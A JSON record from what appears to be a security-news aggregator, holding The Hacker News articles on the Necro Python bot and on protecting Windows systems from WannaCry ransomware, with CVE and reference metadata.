These new additions serve to highlight that the malware author is actively developing new methods of spreading by taking advantage of publicly disclosed vulnerabilities.\n\nAlso of note is the incorporation of a [polymorphic engine](<https://www.trendmicro.com/vinfo/us/security/definition/Polymorphic-virus>) to mutate its source code with every iteration while keeping the original algorithm intact in a \"rudimentary\" attempt to limit the chances of being detected.\n\n\"Necro Python bot shows an actor that follows the latest development in remote command execution exploits on various web applications and includes the new exploits into the bot,\" Talos researchers said. \"This increases its chances of spreading and infecting systems. Users need to make sure to regularly apply the latest security updates to all of the applications, not just operating systems.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2021-06-03T17:01:00", "modified": "2021-06-03T17:01:42", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://thehackernews.com/2021/06/necro-python-malware-upgrades-with-new.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2021-21972"], "immutableFields": [], "lastseen": "2021-06-03T18:34:22", "history": [], "viewCount": 255, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-21972", "CVE-2017-0145", "CVE-2017-0144"]}, {"type": "githubexploit", "idList": ["6B607D21-8F2D-50F9-8E60-BC95F2E252E1", "52C8ABEA-CBB9-5201-A615-BBC5769F9BC3", "D4220876-A611-59AE-8262-07797542DAB9", "50618611-3CA9-5185-8ED3-53532D99D4B7", "3F8F5249-E116-59FA-9CE1-74380DCC5D51", "64EF6553-4D22-526B-A1CC-09212DBD7625", 
"0C366CAA-5DE0-5E1E-98BD-503473AFAFA2", "4AE4DA23-9B19-512A-AEC4-4DDC3C1650FC", "69E38911-1BFE-5166-9FD4-EC8F4997E3DE", "39EADA2B-CE50-555B-910E-D3B77640C464", "6BCA07B7-CE6D-5F8C-9F75-D9C7E4B072FE", "4A85B104-7AB3-5334-BEAB-DD8CB273CBAF", "502CC8C9-71B8-5BB1-9D39-D1EAA861ABDA", "3738D917-F6B1-5AFF-8F77-DA5EF5276D89", "C98B31E5-B85D-50EE-9596-F00F1B89A800", "7B41BE78-EA76-5BF3-A0BC-250C3D753626", "46CBB13F-0CFD-5D36-BDAB-38B8D306B155", "55989E2C-3C33-5EB8-AADF-9B52B80F48D6", "5711B5D3-F257-5128-8C1A-908EACEAEC29", "0D23F068-44DE-5104-B4F1-A0E53C83D60F", "626E6774-0ACC-594C-BB61-E89F8F034B11"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B3E0B6D7-814D-4DB3-BA2B-8C2F79B7BE7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:7A0E7E3752712070F3E75CEF26AC2CC0"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0200", "CPAI-2017-0198", "CPAI-2021-0106"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7F5516EB3D3811BAE47D74129049D93F"]}, {"type": "vmware", "idList": ["VMSA-2021-0002"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", 
"EDB-ID:50056", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:49602"]}, {"type": "zdt", "idList": ["1337DAY-ID-36472", "1337DAY-ID-35912", "1337DAY-ID-35863", "1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27803", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-35879", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:161527", "PACKETSTORM:154690", "PACKETSTORM:163268", "PACKETSTORM:161590", "PACKETSTORM:156196", "PACKETSTORM:161695", "PACKETSTORM:142602", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "MS17-010.NASL", "VMWARE_VCENTER_CVE-2021-21972.NBIN", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0145"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-06-03T18:34:22", "rev": 2}, "score": {"value": 6.5, "vector": "NONE", "modified": "2021-06-03T18:34:22", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.thn.ThnBulletin", "_object_types": ["robots.models.base.Bulletin", 
"robots.models.thn.ThnBulletin"], "cvss2": {}, "cvss3": {}}, {"id": "THN:18A54BDD63D7DC2B3284D326E6510150", "type": "thn", "bulletinFamily": "info", "title": "WannaCry Ransomware: Everything You Need To Know Immediately", "description": "[![how-to-wannacry-ransomware](https://1.bp.blogspot.com/-9RR9oKGt5SE/WRnQ-ABMDaI/AAAAAAAAsqQ/t9fGmbmEYCo9PSqPRMGa9F-t8Y_76iOywCLcB/s1600-e20/how-to-wannacry-ransomware.png)](<https://1.bp.blogspot.com/-9RR9oKGt5SE/WRnQ-ABMDaI/AAAAAAAAsqQ/t9fGmbmEYCo9PSqPRMGa9F-t8Y_76iOywCLcB/s1600-e20/how-to-wannacry-ransomware.png>)\n\nBy now I am sure you have already heard something about the [WannaCry ransomware](<https://thehackernews.com/2017/05/wannacry-ransomware-cyber-attack.html>), and are wondering what's going on, who is doing this, and whether your computer is secure from this insanely fast-spreading threat that has already hacked nearly 200,000 Windows PCs over the weekend. \n \nThe only positive thing about this attack is that \u2014 you are here \u2014 as after reading this easy-to-understandable awareness article, you would be so cautious that you can save yourself from WannaCry, as well as other similar cyber attacks in the future. \n \n**Also Read \u2014** [Google Researcher Finds Link Between WannaCry Attacks and North Korea](<https://thehackernews.com/2017/05/wannacry-lazarus-north-korea.html>). \n \nSince this widely spread ransomware attack is neither the first nor the last one to hit users worldwide, prevention is always the key to protect against such malware threats. \n \n\n\n[What is WannaCry? How to Protect your Computer from WannaCry Ransomware? 
Follow These Simple Steps.](<https://www.blogger.com/What+is+%23WannaCry%3F+How+to+Protect+your+Computer+from+WannaCry+%23Ransomware%3F+Follow+These+Simple+Steps+http%3A%2F%2Fthehackernews.com%2F2017%2F05%2Fhow-to-wannacry-ransomware.html+%40TheHackersNews>) \n\n\n[ TWEET THIS __](<https://twitter.com/intent/tweet?text=What+is+%23WannaCry%3F+How+to+Protect+your+Computer+from+WannaCry+%23Ransomware%3F+Follow+These+Simple+Steps+http%3A%2F%2Fthehackernews.com%2F2017%2F05%2Fhow-to-wannacry-ransomware.html+%40TheHackersNews>)\n\n \nIn this article, we have provided some of the most important primary security tips that you should always follow, and we advise you to share them with everyone you care for. \n \n\n\n### What is Ransomware &amp; Why WannaCry is More Dangerous?\n\n_(A simple video demonstration of WannaCry Ransomware, showing how fast it spreads from system to system without any user interaction)_ \n \nFor those unaware, Ransomware is a computer virus that usually spreads via spam emails and malicious download links, specially designed to lock up the files on a computer until the victim pays the ransom demand, usually $300-$500 in Bitcoins. \n \nBut what makes WannaCry so unique and nasty is its ability to self-spread without even needing to click any link or file. \n \nThe WannaCry ransomware, also known as Wanna Decryptor, leverages a Windows SMB exploit, dubbed **[EternalBlue](<https://thehackernews.com/2017/04/windows-hacking-tools.html>)**, that allows a remote hacker to hijack computers running an unpatched Microsoft Windows operating system. \n \nOnce infected, WannaCry also scans for other unpatched PCs connected to the same local network, as well as random hosts on the wider Internet, to spread itself quickly. 
\n \n\n\n### What Has Happened So Far\n\n[![wannacry-ransomware-cyber-attack](https://1.bp.blogspot.com/--CRkMyWv77U/WRnSBzGBFOI/AAAAAAAAsqU/glEj-9EvHH4XNiyp08QdFAMRkDetWMOpQCLcB/s1600-e20/wannacry-ransomware-cyber-attack.png)](<https://1.bp.blogspot.com/--CRkMyWv77U/WRnSBzGBFOI/AAAAAAAAsqU/glEj-9EvHH4XNiyp08QdFAMRkDetWMOpQCLcB/s1600-e20/wannacry-ransomware-cyber-attack.png>)\n\nWe have been covering this story since Friday, when this malware first emerged and hit several hospitals across the globe, eventually forcing them to shut down their entire IT systems over the weekend, hence rejecting patients' appointments and cancelling operations. \n \nLater this cyber attack brought many organizations to their knees. \n \nInstead of repeating the same details again, read our previous articles to dig deeper and learn what has happened so far: \n \n\n\n * **[Day 1: OutCry](<https://thehackernews.com/2017/05/wannacry-ransomware-unlock.html>) **\u2014 WannaCry targeted over 90,000 computers in 99 countries.\n * **[Day 2: The Patch Day](<https://thehackernews.com/2017/05/wannacry-ransomware-windows.html>) **\u2014 A security researcher successfully found a way to slow down the infection rate, and meanwhile, Microsoft released emergency patch updates for unsupported versions of Windows.\n * **[Day 3: New Variants Arrive](<https://thehackernews.com/2017/05/wannacry-ransomware-cyber-attack.html>) **\u2014 Just yesterday, some new variants of WannaCry, with and without a kill-switch, were detected in the wild that would be difficult to stop for at least the next few weeks.\n \n\n\n### Isn\u2019t the Cyber Attack Over?\n\n \nAbsolutely not. \n \nThis is just the beginning. As I reported yesterday, security researchers have detected some new versions of this ransomware, dubbed **[WannaCry 2.0](<https://thehackernews.com/2017/05/wannacry-ransomware-cyber-attack.html>)**, which couldn\u2019t be stopped by the kill switch. 
\n \nWhat's even worse is that the new WannaCry variant believed to be created by someone else, and not the hackers behind the first WannaCry ransomware. \n \nIt has been speculated that now other organized cybercriminal gangs, as well as script-kiddies can get motivated by this incident to create and spread similar malicious ransomware. \n \n\n\n### How to Protect Yourself from WannaCry Ransomware?\n\n \nHere are some simple tips you should always follow because most computer viruses make their ways into your systems due to lack of simple security practices: \n \n\n\n#### 1\\. Always Install Security Updates\n\nIf you are using any version of Windows, except Windows 10, with SMB protocol enabled, make sure your computer should always receive updates automatically from the Microsoft, and it\u2019s up-to-date always. \n\n\n#### \n2\\. Patch SMB Vulnerability\n\nSince WannaCry has been exploiting a critical [SMB remote code execution vulnerability](<https://thehackernews.com/2017/04/window-zero-day-patch.html>) (CVE-2017-0148) for which Microsoft has already released a patch ([MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) in the month of March, you are advised to ensure your system has installed those patches. \n \nMoreover, Microsoft has been very generous to its users in this difficult time that the company has even released the SMB patches ([download from here](<https://support.microsoft.com/en-in/help/2696547/how-to-enable-and-disable-smbv1,-smbv2,-and-smbv3-in-windows-vista,-windows-server-2008,-windows-7,-windows-server-2008-r2,-windows-8,-and-windows-server-2012>)) for its unsupported versions of Windows as well, including Windows XP, Vista, 8, Server 2003 and 2008. \n \n**Note:** If you are using Windows 10 Creators Update (1703), you are not vulnerable to SMB vulnerability. \n \n\n\n#### 3\\. 
Disable SMB\n\nEven if you have installed the patches, you are advised to disable Server Message Block version 1 (SMBv1) protocol, which is enabled by default on Windows, to prevent against WannaCry ransomware attacks. \n \nHere's the list of simple steps you can follow to disable SMBv1: \n\n\n 1. Go to Windows' Control Panel and open 'Programs.'\n 2. Open 'Features' under Programs and click 'Turn Windows Features on and off.'\n 3. Now, scroll down to find 'SMB 1.0/CIFS File Sharing Support' and uncheck it.\n 4. Then click OK, close the control Panel and restart the computer.\n\n \n\n\n#### 4\\. Enable Firewall &amp; Block SMB Ports\n\nAlways keep your firewall enabled, and if you need to keep SMBv1 enabled, then just modify your firewall configurations to block access to SMB ports over the Internet. The protocol operates on TCP ports 137, 139, and 445, and over UDP ports 137 and 138. \n \n\n\n#### 5\\. Use an Antivirus Program\n\nAn evergreen solution to prevent against most threats is to use a good antivirus software from a reputable vendor and always keep it up-to-date. \n \nAlmost all antivirus vendors have already added detection capability to block WannaCry, as well as to prevent the secret installations from malicious applications in the background. \n \n\n\n#### 6\\. Be Suspicious of Emails, Websites, and Apps\n\nUnlike WannaCry, most ransomware spread through phishing emails, malicious adverts on websites, and third-party apps and programs. \n \nSo, you should always exercise caution when opening uninvited documents sent over an email and clicking on links inside those documents unless verifying the source to safeguard against such ransomware infection. \n \nAlso, never download any app from third-party sources, and read reviews even before installing apps from official stores. \n \n\n\n#### 7\\. 
Regularly Back Up Your Files:\n\nTo always have a tight grip on all your important documents and files, keep a good backup routine in place that copies them to an external storage device that is not kept permanently connected to your computer. \n \nThat way, if any ransomware infects you, it cannot encrypt your backups. \n \n\n\n#### 8\\. Keep Your Knowledge Up-to-Date\n\nThere's not a single day that goes by without a report on cyber attacks and vulnerabilities in popular software and services, such as Android, iOS, Windows, Linux and Mac computers as well. \n \nSo, it\u2019s high time for users of any domain to follow the day-to-day happenings of the cyber world, which would not only help them keep their knowledge up-to-date, but also guard against even sophisticated cyber attacks. \n \n\n\n### What to do if WannaCry infects you?\n\n \nWell, nothing. \n \nIf WannaCry ransomware has infected you, you can\u2019t decrypt your files until you pay the ransom to the hackers and get a secret key to unlock your files. \n \n\n\n#### Never Pay the Ransom:\n\nIt\u2019s up to the affected organizations and individuals to decide whether or not to pay the ransom, depending upon the importance of their files locked by the ransomware. \n \nBut before making any final decision, just keep in mind: there's no guarantee that even after paying the ransom, you would regain control of your files. \n \nMoreover, paying the ransom also encourages cyber criminals to come up with similar threats and extort money from a larger audience. \n \nSo, the sure-shot advice to all users is \u2014 Don't Pay the Ransom. \n \n\n\n### Who's Behind WannaCry &amp; Why Would Someone Do This?\n\n \n**Update: Also Read \u2014** [Google Researcher Finds Link Between WannaCry Attacks and North Korea](<https://thehackernews.com/2017/05/wannacry-lazarus-north-korea.html>). 
\n \nWhile it's still not known who is behind WannaCry, such large-scale cyber attacks are often propagated by nation states, but this ongoing attack does not bear any link to foreign governments. \n\n\n> \"The recent attack is at an unprecedented level and will require a complex international investigation to identify the culprits,\" said Europol, Europe's police agency.\n\nWhy are they hijacking hundreds of thousands of computers around the globe? Simple \u2014 to extort money by blackmailing infected users. \n\n\n[![wannacry-bitcoin](https://1.bp.blogspot.com/-cFyPrIlC1x0/WRnkPC28dKI/AAAAAAAAsqg/k_DozZeVaicpcMfeG57WG0CPgLlUcnvDwCLcB/s1600-e20/bitcoin.png)](<https://1.bp.blogspot.com/-cFyPrIlC1x0/WRnkPC28dKI/AAAAAAAAsqg/k_DozZeVaicpcMfeG57WG0CPgLlUcnvDwCLcB/s1600-e20/bitcoin.png>)\n\nBy looking at the infection rate, it seems like the criminals responsible for this absurd attack would have made lots and lots of dollars so far, but surprisingly they have made relatively little in the way of profits, according to [@actual_ransom](<https://twitter.com/actual_ransom>), a Twitter account that\u2019s tweeting details of every single transaction. \n \nAt the time of writing, the WannaCry attackers have received 171 payments totaling 27.96968763 BTC ($47,510.71 USD). \n \n\n\n### Who is responsible for WannaCry Attack?\n\n \n\u2014 Is it Microsoft who created an operating system with so many vulnerabilities? \n \n\u2014 Or is it the NSA, the intelligence agency of the United States, who found this critical SMB vulnerability and indirectly, facilitates WannaCry like attacks by not disclosing it to Microsoft? \n \n\u2014 Or is it the Shadow Brokers, the hacking group, who managed to hack the NSA servers, but instead of reporting it to Microsoft, they decided to dump hacking tools and zero-day exploits in public? \n \n\u2014 Or is it the Windows users themselves, who did not install the patches on their systems or are still using an unsupported version of Windows? 
\n \nI do not know who can be blamed for this attack, but according to me, all of them shares equal responsibility. \n \n\n\n### Microsoft Blames NSA/CIA for WannaCry Cyber Attack\n\n \nMicrosoft has hit out at the US government for facilitating cyber attacks, like WannaCry, by not disclosing the software vulnerabilities to the respective vendors and holding them for their benefits, like global cyber espionage. \n \nIn a blog post on Sunday, Microsoft President Brad Smith [condemned](<https://blogs.microsoft.com/on-the-issues/2017/05/14/need-urgent-collective-action-keep-people-safe-online-lessons-last-weeks-cyberattack/>) the US intelligence agencies\u2019 unethical practices, saying that the \"widespread damage\" caused by WannaCry happened due to the NSA, CIA and other intelligence agencies for holding zero-days and allowing them to be stolen by hackers. \n\n\n> \"This is an emerging pattern in 2017. We have seen vulnerabilities stored by the CIA show up on WikiLeaks, and now this vulnerability stolen from the NSA has affected customers around the world,\" Smith said.\n\nThis statement also publicly confirms that the hacking tools and exploits leaked by the Shadow Brokers belong to Equation Group, an elite group of hackers from NSA. \n\n\n> \"Repeatedly, exploits in the hands of governments have leaked into the public domain and caused widespread damage,\" Smith wrote.\n\nThank you. 
Stay tuned.\n", "published": "2017-05-15T05:11:00", "modified": "2018-03-15T19:48:57", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "href": "https://thehackernews.com/2017/05/how-to-wannacry-ransomware.html", "reporter": "Mohit Kumar", "references": [], "cvelist": ["CVE-2017-0148"], "lastseen": "2018-03-15T23:37:17", "history": [{"lastseen": "2018-01-27T10:06:40", "bulletin": {"id": "THN:18A54BDD63D7DC2B3284D326E6510150", "type": "thn", "bulletinFamily": "info", "title": "WannaCry Ransomware: Everything You Need To Know Immediately", "description": "[![how-to-wannacry-ransomware](https://4.bp.blogspot.com/-9RR9oKGt5SE/WRnQ-ABMDaI/AAAAAAAAsqQ/t9fGmbmEYCo9PSqPRMGa9F-t8Y_76iOywCLcB/s1600/how-to-wannacry-ransomware.png)](<https://4.bp.blogspot.com/-9RR9oKGt5SE/WRnQ-ABMDaI/AAAAAAAAsqQ/t9fGmbmEYCo9PSqPRMGa9F-t8Y_76iOywCLcB/s1600/how-to-wannacry-ransomware.png>)\n\nBy now I am sure you have already heard something about the [WannaCry ransomware](<https://thehackernews.com/2017/05/wannacry-ransomware-cyber-attack.html>), and are wondering what's going on, who is doing this, and whether your computer is secure from this insanely fast-spreading threat that has already hacked nearly 200,000 Windows PCs over the weekend. \n \nThe only positive thing about this attack is that \u2014 you are here \u2014 as after reading this easy-to-understandable awareness article, you would be so cautious that you can save yourself from WannaCry, as well as other similar cyber attacks in the future. \n \n**Also Read \u2014** [Google Researcher Finds Link Between WannaCry Attacks and North Korea](<https://thehackernews.com/2017/05/wannacry-lazarus-north-korea.html>). \n \nSince this widely spread ransomware attack is neither the first nor the last one to hit users worldwide, prevention is always the key to protect against such malware threats. \n \n\n\n[What is WannaCry? How to Protect your Computer from WannaCry Ransomware? 
Follow These Simple Steps.](<https://www.blogger.com/What+is+%23WannaCry%3F+How+to+Protect+your+Computer+from+WannaCry+%23Ransomware%3F+Follow+These+Simple+Steps+http%3A%2F%2Fthehackernews.com%2F2017%2F05%2Fhow-to-wannacry-ransomware.html+%40TheHackersNews>) \n\n\n[ TWEET THIS __](<https://twitter.com/intent/tweet?text=What+is+%23WannaCry%3F+How+to+Protect+your+Computer+from+WannaCry+%23Ransomware%3F+Follow+These+Simple+Steps+http%3A%2F%2Fthehackernews.com%2F2017%2F05%2Fhow-to-wannacry-ransomware.html+%40TheHackersNews>)\n\n \nIn this article, we have provided some of the most important primary security tips that you should always follow and advised to share with everyone you care for. \n \n\n\n### What is Ransomware &amp; Why WannaCry is More Dangerous?\n\n_(A simple video demonstrating of WannaCry Ransomware, showing how fast it spreads from system-to-system without any user Interaction)_ \n \nFor those unaware, Ransomware is a computer virus that usually spreads via spam emails and malicious download links; specially designed to lock up the files on a computer, until the victim pays the ransom demand, usually $300-$500 in Bitcoins. \n \nBut what makes WannaCry so unique and nasty is its ability to self-spread without even need to click any link or a file. \n \nThe WannaCry ransomware, also known as Wanna Decryptor, leverages a Windows SMB exploit, dubbed **[EternalBlue](<https://thehackernews.com/2017/04/windows-hacking-tools.html>)**, that allows a remote hacker to hijack computers running on unpatched Microsoft Windows operating system. \n \nOnce infected, WannaCry also scans for other unpatched PCs connected to the same local network, as well as scans random hosts on the wider Internet, to spread itself quickly. 
\n \n\n\n### What Has Happened So Far\n\n[![wannacry-ransomware-cyber-attack](https://2.bp.blogspot.com/--CRkMyWv77U/WRnSBzGBFOI/AAAAAAAAsqU/glEj-9EvHH4XNiyp08QdFAMRkDetWMOpQCLcB/s1600/wannacry-ransomware-cyber-attack.png)](<https://2.bp.blogspot.com/--CRkMyWv77U/WRnSBzGBFOI/AAAAAAAAsqU/glEj-9EvHH4XNiyp08QdFAMRkDetWMOpQCLcB/s1600/wannacry-ransomware-cyber-attack.png>)\n\nWe have been covering this story since Friday when this malware was first emerged and hit several hospitals across the globe, eventually forcing them to shut down their entire IT systems over the weekend, hence rejecting patients appointments, and cancel operations. \n \nLater this cyber attack brought down many organizations to their knees. \n \nInstead of repeating same details again, read our previous articles dig deeper and know what has happened so far: \n \n\n\n * **[Day 1: OutCry](<https://thehackernews.com/2017/05/wannacry-ransomware-unlock.html>) **\u2014 WannaCry targeted over 90,000 computers in 99 countries.\n * **[Day 2: The Patch Day](<https://thehackernews.com/2017/05/wannacry-ransomware-windows.html>) **\u2014 A security researcher successfully found a way to slow down the infection rate, and meanwhile, Microsoft releases emergency patch updates for unsupported versions of Windows.\n * **[Day 3: New Variants Arrives](<https://thehackernews.com/2017/05/wannacry-ransomware-cyber-attack.html>) **\u2014 Just yesterday, some new variants of WannaCry, with and without a kill-switch, were detected in the wild would be difficult to stop for at least next few weeks.\n \n\n\n### Isn\u2019t the Cyber Attack Over?\n\n \nAbsolutely not. \n \nThis is just beginning. As I reported yesterday, security researchers have detected some new versions of this ransomware, dubbed **[WannaCry 2.0](<https://thehackernews.com/2017/05/wannacry-ransomware-cyber-attack.html>)**, which couldn\u2019t be stopped by the kill switch. 
\n \nWhat's even worse is that the new WannaCry variant is believed to have been created by someone else, and not by the hackers behind the first WannaCry ransomware. \n \nIt has been speculated that other organized cybercriminal gangs, as well as script-kiddies, may now be motivated by this incident to create and spread similar ransomware. \n \n\n\n### How to Protect Yourself from WannaCry Ransomware?\n\n \nHere are some simple tips you should always follow, because most malware makes its way into systems due to a lack of basic security practices: \n \n\n\n#### 1\\. Always Install Security Updates\n\nIf you are using any version of Windows with the SMB protocol enabled \u2014 Windows 10 is not exempt; only builds that have received the March 2017 update are protected (see the note on 1703 below) \u2014 make sure your computer receives updates automatically from Microsoft and is always up-to-date. \n\n\n#### \n2\\. Patch SMB Vulnerability\n\nSince WannaCry has been exploiting a critical [SMB remote code execution vulnerability](<https://thehackernews.com/2017/04/window-zero-day-patch.html>) (the SMBv1 flaws tracked as CVE-2017-0143 through CVE-2017-0148; the EternalBlue exploit itself targets CVE-2017-0144) for which Microsoft had already released a patch ([MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) in March, you are advised to verify that the patch is actually installed on every system rather than assuming it is; a vulnerability-scanner check for MS17-010 is the reliable way to confirm this across a fleet. \n \nMoreover, Microsoft has been very generous to its users in this difficult time: the company has even released the SMB patches for its unsupported versions of Windows as well, including Windows XP, Vista, 8, Server 2003 and 2008 (the linked page, [here](<https://support.microsoft.com/en-in/help/2696547/how-to-enable-and-disable-smbv1,-smbv2,-and-smbv3-in-windows-vista,-windows-server-2008,-windows-7,-windows-server-2008-r2,-windows-8,-and-windows-server-2012>), describes how to enable and disable SMBv1 on those systems rather than hosting the patches themselves). \n \n**Note:** If you are using Windows 10 Creators Update (1703), you are not vulnerable to this SMB vulnerability; disabling SMBv1 (step 3) is still recommended. \n \n\n\n#### 3\\. 
Disable SMBv1\n\nEven if you have installed the patches, you are advised to disable the Server Message Block version 1 (SMBv1) protocol, which is enabled by default on Windows, to remove the attack surface WannaCry uses: the patch fixes this flaw, while disabling SMBv1 takes the legacy protocol off the wire entirely, which also protects against future SMBv1 bugs. \n \nHere's the list of simple steps you can follow to disable SMBv1 on a client edition of Windows: \n\n\n 1. Go to Windows' Control Panel and open 'Programs.'\n 2. Open 'Features' under Programs and click 'Turn Windows Features on and off.'\n 3. Now, scroll down to find 'SMB 1.0/CIFS File Sharing Support' and uncheck it.\n 4. Then click OK, close the Control Panel and restart the computer.\n\nBefore disabling it across a fleet, check for anything that still depends on SMBv1 (old NAS devices, printers, legacy applications) and fix those first, rather than re-enabling SMBv1 later. \n \n\n\n#### 4\\. Enable Firewall &amp; Block SMB Ports\n\nAlways keep your firewall enabled, and even if you need to keep SMBv1 enabled, configure your firewall to block access to the SMB ports from the Internet. SMB runs directly over TCP port 445 and, via NetBIOS, over TCP port 139; the NetBIOS name and datagram services use UDP ports 137 and 138. Inbound TCP 139 and 445 from the Internet must be blocked at a minimum; blocking them between workstations on the internal network as well limits how far a worm like WannaCry can spread laterally. \n \n\n\n#### 5\\. Use an Antivirus Program\n\nAn evergreen solution to protect against most threats is to use a good antivirus product from a reputable vendor and always keep it up-to-date. \n \nAlmost all antivirus vendors have already added detection capability to block WannaCry, as well as to prevent the silent installation of malicious applications in the background. Note that antivirus is a complement to steps 1 to 4, not a substitute: a worm arriving over SMB on an unpatched host does not rely on the user opening anything, so patching and blocking the ports come first. \n \n\n\n#### 6\\. Be Suspicious of Emails, Websites, and Apps\n\nUnlike WannaCry, most ransomware spreads through phishing emails, malicious adverts on websites, and third-party apps and programs. \n \nSo, you should always exercise caution when opening unsolicited documents sent over email, and avoid clicking links inside those documents unless you have verified the source, to safeguard against such ransomware infections. \n \nAlso, never download any app from third-party sources, and read reviews even before installing apps from official stores. \n \n\n\n#### 7\\. 
Regularly Back Up Your Files:\n\nTo keep control of all your important documents and files, keep a good backup routine in place that copies them to an external storage device which is not left connected to your computer (or to offline or write-once storage). A backup that is reachable as a mapped drive or network share at the moment the ransomware runs will simply be encrypted along with everything else. \n \nThat way, if any ransomware infects you, it cannot encrypt your backups. Test restores periodically; a backup that has never been restored is not yet a backup. \n \n\n\n#### 8\\. Keep Your Knowledge Up-to-Date\n\nThere's not a single day that goes by without a report on cyber attacks and vulnerabilities in popular software and services, such as Android, iOS, Windows, Linux and Mac computers as well. \n \nSo, it\u2019s high time for users of any domain to follow the day-to-day happenings of the cyber world, which would not only help them keep their knowledge up-to-date, but also help them prevent even sophisticated cyber attacks. \n \n\n\n### What to do if WannaCry infects you?\n\n \nWell, very little about the files themselves. \n \nIf WannaCry ransomware has infected you, there is no known way to decrypt your files without the secret key the attackers hold. What you can and should do is: disconnect the infected machine from the network immediately (it actively scans for and infects other unpatched hosts over SMB), preserve it for investigation if needed, do not pay, and rebuild from a clean installation plus your offline backups after applying MS17-010. \n \n\n\n#### Never Pay the Ransom:\n\nIt\u2019s up to the affected organizations and individuals to decide whether or not to pay the ransom, depending upon the importance of the files locked by the ransomware. \n \nBut before making any final decision, just keep in mind: there's no guarantee that even after paying the ransom, you would regain control of your files. \n \nMoreover, paying the ransom also encourages cyber criminals to come up with similar threats and extort money from a larger audience. \n \nSo, the sure shot advice to all users is \u2014 Don't Pay the Ransom. \n \n\n\n### Who's Behind WannaCry &amp; Why Would Someone Do This?\n\n \n**Update: Also Read \u2014** [Google Researcher Finds Link Between WannaCry Attacks and North Korea](<https://thehackernews.com/2017/05/wannacry-lazarus-north-korea.html>). 
